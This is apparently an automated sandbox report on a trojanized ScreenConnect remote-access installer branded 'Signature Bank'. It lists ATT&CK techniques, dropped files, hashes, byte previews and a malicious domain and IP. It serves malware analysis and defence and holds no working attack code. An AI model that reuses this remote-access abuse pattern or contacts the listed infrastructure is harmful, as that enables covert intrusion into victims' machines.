Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	51 Virtualization/Sandbox Evasion	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	13 Process Injection	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	1 Hidden Users	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service
Business Relationships	Server	Trusted Relationship	Visual Basic	Container Orchestration Job	Container Orchestration Job	1 Bootkit	Web Portal Capture	Local Groups	Component Object Model and Distributed COM	Local Email Collection	Internal Proxy	Commonly Used Port	Direct Network Flood
Identify Business Tempo	Botnet	Hardware Additions	Python	Hypervisor	Process Injection	1 Rundll32	Credential API Hooking	Domain Groups	Exploitation of Remote Services	Remote Email Collection	External Proxy	Transfer Data to Cloud Account	Reflection Amplification

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
tmpzNIZ0YQ.exe	21%	ReversingLabs	Win32.PUA.ConnectWise

Dropped Files

Source	Detection	Scanner
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsCredentialProvider.dll	0%	ReversingLabs
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsFileManager.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\Microsoft.Deployment.Compression.Cab.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\Microsoft.Deployment.Compression.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\Microsoft.Deployment.WindowsInstaller.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\ScreenConnect.Core.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\ScreenConnect.InstallerActions.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\MSI7FE2.tmp-\ScreenConnect.Windows.dll	0%	ReversingLabs
C:\Windows\Installer\MSI9148.tmp	0%	ReversingLabs
C:\Windows\Installer\MSI934C.tmp	0%	ReversingLabs

Name	IP	Active	Malicious	Antivirus Detection	Reputation
lokistorage.xyz	95.164.16.15	true	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://wixtoolset.org/releases/	rundll32.exe, 00000005.00000003.1442482197.00000000048C9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1442482197.0000000004858000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr	false	high
http://wixtoolset.org/news/	rundll32.exe, 00000005.00000003.1442482197.00000000048C9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1442482197.0000000004858000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	ScreenConnect.ClientService.exe, 00000008.00000002.2662716124.0000000001E0F000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1544940596.0000000002EC6000.00000004.00000800.00020000.00000000.sdmp	false	high
http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v	rundll32.exe, 00000005.00000003.1442482197.00000000048C9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1442482197.0000000004858000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr	false	high
https://feedback.screenconnect.com/Feedback.axd	ScreenConnect.Core.dll.3.dr	false	high
https://docs.rs/getrandom#nodejs-es-module-support	ScreenConnect.WindowsCredentialProvider.dll.3.dr	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
95.164.16.15	lokistorage.xyz	Gibraltar		29632	NASSIST-ASGI	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1554619
Start date and time:	2024-11-12 18:39:16 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	tmpzNIZ0YQ.exe renamed because original name is a hash value
Original Sample Name:	29e369f7b7ee09c8b15a8dc133561d4d71e55c100eeff8d7e72d2c6016b179e9.exe
Detection:	MAL
Classification:	mal50.troj.evad.winEXE@17/65@1/1
EGA Information:	Successful, ratio: 60%
HCA Information:	Successful, ratio: 65% Number of executed functions: 318 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target rundll32.exe, PID 7656 because it is empty
Execution Graph export aborted for target tmpzNIZ0YQ.exe, PID 7392 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: tmpzNIZ0YQ.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NASSIST-ASGI	Josho.m68k.elf	Get hash	malicious	Unknown	Browse	95.164.4.65
	J5uGzpvcAa.elf	Get hash	malicious	Unknown	Browse	95.164.4.65
	nPRmTlXhOT.elf	Get hash	malicious	Unknown	Browse	95.164.4.65
	OwBugJ5CiC.elf	Get hash	malicious	Unknown	Browse	95.164.4.65
	H5LPetzgXV.elf	Get hash	malicious	Unknown	Browse	95.164.4.65
	4l9YKCc7qQ.elf	Get hash	malicious	Unknown	Browse	95.164.4.65
	mCR2IJsjgy.elf	Get hash	malicious	Unknown	Browse	95.164.4.65
	Josho.arm7.elf	Get hash	malicious	Mirai	Browse	95.164.4.65
	J3m5xLlT8D.exe	Get hash	malicious	DCRat	Browse	95.164.6.175
	na.elf	Get hash	malicious	Unknown	Browse	94.131.118.154

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll	Latest version 4.7.exe	Get hash	malicious	ScreenConnect Tool	Browse
	Latest version 4.7.exe	Get hash	malicious	ScreenConnect Tool	Browse
	INSPECAO-B01S.msi	Get hash	malicious	ScreenConnect Tool	Browse
	1.exe	Get hash	malicious	ScreenConnect Tool	Browse
	1.exe	Get hash	malicious	ScreenConnect Tool	Browse
	5iT2ITz44g.exe	Get hash	malicious	ScreenConnect Tool	Browse
	5iT2ITz44g.exe	Get hash	malicious	ScreenConnect Tool	Browse
	E-receipt-67.exe	Get hash	malicious	ScreenConnect Tool	Browse
	E-receipt-67.exe	Get hash	malicious	ScreenConnect Tool	Browse
	statment.exe	Get hash	malicious	ScreenConnect Tool	Browse

Created / dropped Files

C:\Config.Msi\418a04.rbs

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	modified
Size (bytes):	219640
Entropy (8bit):	6.581196702368715
Encrypted:	false
SSDEEP:	3072:R09LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMGi:R0uH2aCGw1ST1wQLdqvi
MD5:	0639C046D5333077269FA82C5140536E
SHA1:	C227741CACAA33B6A048C5008E7AB3E03B7FF23B
SHA-256:	1AD9020677AD3407199352A1D7CE2B5F6F7032A5CDB31BA6AF8167F21D94FCDC
SHA-512:	8F6E78EB8E7DE9B6452C46C044E3800007AF7C1910177101ED424A1ACA020191A98C604DED5795E7A9DBFED5B0E3A3AEF6DC5FE42DDA70317ECC0496E07E22D5
Malicious:	false
Yara Hits:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\418a04.rbs, Author: Joe Security
Reputation:	low
Preview:	...@IXOS.@.....@.elY.@.....@.....@.....@.....@.....@......&.{BF3035CA-924F-7DEB-610F-14962D2B8EE2}'.ScreenConnect Client (20ae101cef0f1acf)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{BF3035CA-924F-7DEB-610F-14962D2B8EE2}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (20ae101cef0f1acf)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{02BB93AF-5D7F-2FA3-2CF1-9B67E8FF130E}&.{BF3035CA-924F-7DEB-610F-14962D2B8EE2}.@......&.{CD7C3ECA-C9AF-5145-BA7A-4A372EAC7AA5}&.{BF3035CA-924F-7DEB-610F-14962D2B8EE2}.@......&.{C0E56857-1338-1BBE-56C3-EE29B4292C6F}&.{BF3035CA-924F-7DEB-610F-14962D2B8EE2}.@......&.{6E5988BE-3FE4-2081-9090-28726FA53B07}&.{BF3035CA-924F-7DEB-610F-14962D2B8EE2}.@......&.{AAFCFDA6-3A31-9AA2-04B7-C6C55684F80B}&.{BF3035CA-924F-7DEB-610F-14962D2B8EE2}.@......&.{7BEC3624-40B7-0ABF-4C6B-0093902CAEA0}&.{BF3035CA-924F-7DEB-610F-14962D2B8EE2}.@....

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.Override.en-US.resources

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	241
Entropy (8bit):	4.920230500734458
Encrypted:	false
SSDEEP:	6:8kVXdyrKDLIP12MUAvvR+ojlX2KG6cAtsiMI4CAcO:rHy2DLI4MWoj12K9cAuiMI4L
MD5:	E412586907C81C15CED17A120DE270B3
SHA1:	EE0E2EDE15DAD65285184C2044367CC6D20D8709
SHA-256:	0F0E577CD0071C73AFB57530C67C5C79E3A0695FBA617ED5531B882AAB0531EB
SHA-512:	CFB7699A72B393B06B89C197F378EBC31650E0D9B96966F1464BA79E6EF92B6EE9D951D588E47250E9A523869E0E9FDE592E237168B429F430C1A11EE2F8045B
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..n_........ A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.......Signature Bank

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.Override.resources

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	169094
Entropy (8bit):	7.97364017646364
Encrypted:	false
SSDEEP:	3072:Q1BQsAtdZEVwx9whh71/ccEOCnJ8GEsuMNSWID4ygf8AuSJpKeza:QHQ96VwPYhx/cc9mJnEsu81Ln/Jwt
MD5:	DE75320C1124233901AA23C368595375
SHA1:	23A40D4AA2F1D71F819581F0EA9FEADA5ED234DA
SHA-256:	32EA2F66A6C8F4345C4AFF82465A5BB81588743CE8CBB25F6D4BEE90E28A00DB
SHA-512:	5FDC124BF5D9C30D13019D4326C91BD5FEEAF46F337C14F87A50E468B0AB8737F34180E8A4CE7B005B761B82ED100812E3B4C5C786AA21F3B8270733A462724B
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADPJ....H.....;...H...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.....DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.8... 3....PNG........IHDR.......8........C....sBIT....\|.d.....pHYs.........B(.x....tEXtSoftware.www.inkscape.org..<... .IDATx.....(.....'.....q..R. ...L.7.c..$H"..........A...d.k^.r.............u.....r$.......<..8.....O.....{..Xi6....F....P.........N,..I\|1..%7.v......X.n..r..5........H..4.GK.~?.9.@K/.+....s=.4Y..-~...;ge..E_Htd..C..../..!.'o...n.6.....jiG`G.~.v........4YJ<g.g...s.....k$...ki{.)..8....AX.X.-..(...f.'..H...5.....\|.O....t........p.K....x..y......d.$nx........1...z...U./..:j...u..^..oz..^K.[.-!.........t..m.t..$O........H....h..$..(....;V....t..B.u.f...K...HHS.y....~,.U:Q...D\|.....,v..x..n.7..>x".H.z.p..5.:WR>..46.&..4....u..

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.en-US.resources

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	49959
Entropy (8bit):	4.758252520953682
Encrypted:	false
SSDEEP:	1536:sdr6QF+gQpAfqiErOmOCqZUWi+JgJ0FQi9zwHLAhDKZ1HtRKekmrg9:sdr1F+gQOlErOmPqZUWi+JgJ0FQi9zw2
MD5:	511202ED0BA32D7F09EAB394C917D067
SHA1:	DBD611720FD1730198F72DEC09E8E23E6D6488F8
SHA-256:	F8398A235B29AF6569F2B116E0299B95512D042F5A4CD38C98C79729A5FBDB9D
SHA-512:	F04B08938F3EBF8CFA1A1157A94DA3AE4699494BDCE566619AFA5B13A8F6EBE556D522C064E5EA02E343B59A489343F77E3EA2BB2EA390AAE35A626F41CADC77
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C\|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..v.......B....A...a......D..c..w..K,..t...S.....v....7.6\|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........\|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\Client.resources

Process:	C:\Windows\System32\msiexec.exe
File Type:	data
Category:	dropped
Size (bytes):	26722
Entropy (8bit):	7.7401940386372345
Encrypted:	false
SSDEEP:	384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
MD5:	5CD580B22DA0C33EC6730B10A6C74932
SHA1:	0B6BDED7936178D80841B289769C6FF0C8EEAD2D
SHA-256:	DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
SHA-512:	C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Client.dll

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	197120
Entropy (8bit):	6.595800276062395
Encrypted:	false
SSDEEP:	3072:TS77Zz8NtrNOuJTaFs2VUXEWcyzvXqu5zDvJXYt:E7OrJOuJE4Xawqu5G
MD5:	F311A8217807F6C85817058522E234A2
SHA1:	CEB586B3CF7B0EE86EA8242D9B3D8641C9444CD1
SHA-256:	032450CD037D9E0EEC49E0B4FF44073D539775633FB4AF6FD76D4CB19116AAC9
SHA-512:	5EF1F6B595AF9CC7F788680AC3F3E9B8B12BAAFE734A8E2F675BAA57F5EF2C69806492911BDA54F11C5A4B8CF3CCED82CFC6E0ECF214E45083E9F9AA6A83D039
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Latest version 4.7.exe, Detection: malicious, Browse Filename: Latest version 4.7.exe, Detection: malicious, Browse Filename: INSPECAO-B01S.msi, Detection: malicious, Browse Filename: 1.exe, Detection: malicious, Browse Filename: 1.exe, Detection: malicious, Browse Filename: 5iT2ITz44g.exe, Detection: malicious, Browse Filename: 5iT2ITz44g.exe, Detection: malicious, Browse Filename: E-receipt-67.exe, Detection: malicious, Browse Filename: E-receipt-67.exe, Detection: malicious, Browse Filename: statment.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....k%..........." ..0................. ... ....... .......................`.......L....@.....................................O.... ..\|....................@......4...8............................................ ............... ..H............text...P.... ...................... ..`.rsrc...\|.... ......................@..@.reloc.......@......................@..B........................H.......................^................................................(......(....^.(...........%...}....:.(......}....:.(......}....:.(......}......{....:.(......}.....0..A........(....s....%.~'...%-.&~&.....y...s....%.'...(...+(...+o"...o........0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.%...($....5..............s%....=.....0...........~)...%-.&~(.....\|...s&...%.)...(...+..~...%-.&~(.....}...s(...%.*...(...+.r9..

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.dll

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	68096
Entropy (8bit):	6.081952570081618
Encrypted:	false
SSDEEP:	1536:XxgIAw8rVbpcgOswatz8Bn2yRIZMmQ9VIlxnBVb8ER:Xw31b4f0Q9VAnNR
MD5:	3FF07C657068430EF677181D1F67066D
SHA1:	37F7E9D2CCB65B4EA2733393015635EA1B43393E
SHA-256:	D17CF13612039F6A4CA17B56C32399CCBE279A499C8D2F8E910B1FD6F4FFF2B1
SHA-512:	5552208B5649CEAC2B32510EA12D409A85643D27E6A9C335E049195A507AE9211AEE77574376FDE059747998B60AE041E191635A67C3461585ABA7F9B877B095
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C............." ..0..............!... ...@....... ....................................@.................................-!..O....@.......................`....... ..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................a!......H.......Po....................... ........................................(....^.(...........%...}....:.(......}....:.(......}....:.(......}.....~,...%-.&~+.....j...s....%.,...(...+vs....%.}Q.........s....(........0...........s....}.....s....}...........}.......('.....}.....(....&.(..........s....o.....(*...~-...%-.&~+.....k...s....%.-...o ....s!...}.....s"...}.....s#...}...... .... 0u.........s....s>...}....... ..6........s....s>...}.....((...($............o%........

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	95520
Entropy (8bit):	6.505417048098125
Encrypted:	false
SSDEEP:	1536:jg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgIU0HMm7/xK:MhbNDxZGXfdHrX7rAc6myJkgIU0HVY
MD5:	826314610D9E854477B08666330940B5
SHA1:	65B601D60042CF6F263CD38AC2F63CD06A9DE159
SHA-256:	E54963CB63C9E471E2D3D59E55E4C7AEEDCCAFDD616B99C4B3AF230608E4BCC9
SHA-512:	5C01D6DE25D60EB6B1EB72B7FA6401B71153C2A740C41AEEB2BD302CC4E80F5C1A388B647EE16DA196705AC8EDBC60ABDA49B9A531517BB85959CC018FB5D1FB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.................................-.....@.................................p...x....`..P............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...P....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Core.dll

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	546304
Entropy (8bit):	6.03286879586464
Encrypted:	false
SSDEEP:	6144:hAUz5UEsIXxk3QCLKSkGEexE77VcYbUinCLrDfElYzMsdqe1J6tMznSAiOUfw8qg:hK67tEshnkDfyt9MznZd8PTIP8
MD5:	3B1BA4BEBEFDC8A95B0F2F0B4E50C527
SHA1:	15551D2E8BFB829F3A96D161B43DE820C0D417CE
SHA-256:	A843B3A4549C43EF5BD8470CACF5D2F0F3B3C8110441FCC10079FACC7DB3DE29
SHA-512:	F41595586CD5330537F5F02B392310B028E36F618E2583D125430ECD103EBBF6D2CF6BEFCFB1B32279EEB9FD7EF018F49131E3906FB61BC324DA85D93A9A18C7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..N...........i... ........... ....................................@..................................h..O.......t...........................<h..8............................................ ............... ..H............text...@M... ...N.................. ..`.rsrc...t............P..............@..@.reloc...............T..............@..B.................i......H........@...&...................g........................................{:.....{;...V.(<.....}:.....};......0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...... ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D.....{E.....{F...V.(<.....}E.....}F....0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...... F.b# )UU.

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.Windows.dll

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1721344
Entropy (8bit):	6.638160977312247
Encrypted:	false
SSDEEP:	24576:jQNtbLFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTs5:jebLJkGYYpT0+TFiH7efP
MD5:	D196174CF03F86C8776E717F07D5D19F
SHA1:	BBD2C6A59229B3E4EC7C5742248F3F55A61DD216
SHA-256:	A1EDD67A131505CC84D76601474C53874A56B5437B835838E4A866E20F6CD264
SHA-512:	CF4D159BCB42A1A7EA03F8877736CACE109AE79998906B9178C74F7A9B63030CDDC2BC94EF6C5F718E99C2D0039CF3589F8C4F2BF5B67DB94B3B96D2C988B45B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A............" ..0..<..........Z[... ...`....... ....................................@..................................[..O....`..\|...........................dZ..8............................................ ............... ..H............text...h;... ...<.................. ..`.rsrc...\|....`.......>..............@..@.reloc...............B..............@..B................;[......H.......,...................0....Y........................................()...^.()..........%...}....:.().....}....:.().....}....:.().....}......s.....s+...:.(,.....(-.....{...."..}....J.(/........(0...&:.(,.....(1.....{2..."..}2....0..(........(3......+.............(0...&..X....i2.v.(,....s4...}.....s5...}....v.{.....r...p(...+.....o7.....0...........o8....+..o9......(...+&.o....-....,..o................."........{..........o:...&.......(.........0..L...

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsAuthenticationPackage.dll

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	260168
Entropy (8bit):	6.416438906122177
Encrypted:	false
SSDEEP:	3072:qJvChyA4m2zNGvxDd6Q6dtaVNVrlaHpFahvJ9ERnWtMG8Ff2lt9Bgcld5aaYxg:0IvxDdL6d8VNdlC3g0RCXh5D
MD5:	5ADCB5AE1A1690BE69FD22BDF3C2DB60
SHA1:	09A802B06A4387B0F13BF2CDA84F53CA5BDC3785
SHA-256:	A5B8F0070201E4F26260AF6A25941EA38BD7042AEFD48CD68B9ACF951FA99EE5
SHA-512:	812BE742F26D0C42FDDE20AB4A02F1B47389F8D1ACAA6A5BB3409BA27C64BE444AC06D4129981B48FA02D4C06B526CB5006219541B0786F8F37CF2A183A18A73
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........A........................T....................V.......V.......V......................=U......=U......=U$.....=U......Rich....................PE..d.....Qf.........." ...'.^...^.......................................................(....`..........................................e.......f..P................ ......HP..........P%..p............................$..@............p...............................text...t].......^.................. ..`.rdata.......p.......b..............@..@.data....+...........d..............@....pdata... ......."...x..............@..@_RDATA..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................

C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsBackstageShell.exe

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	61216
Entropy (8bit):	6.316664164724877
Encrypted:	false
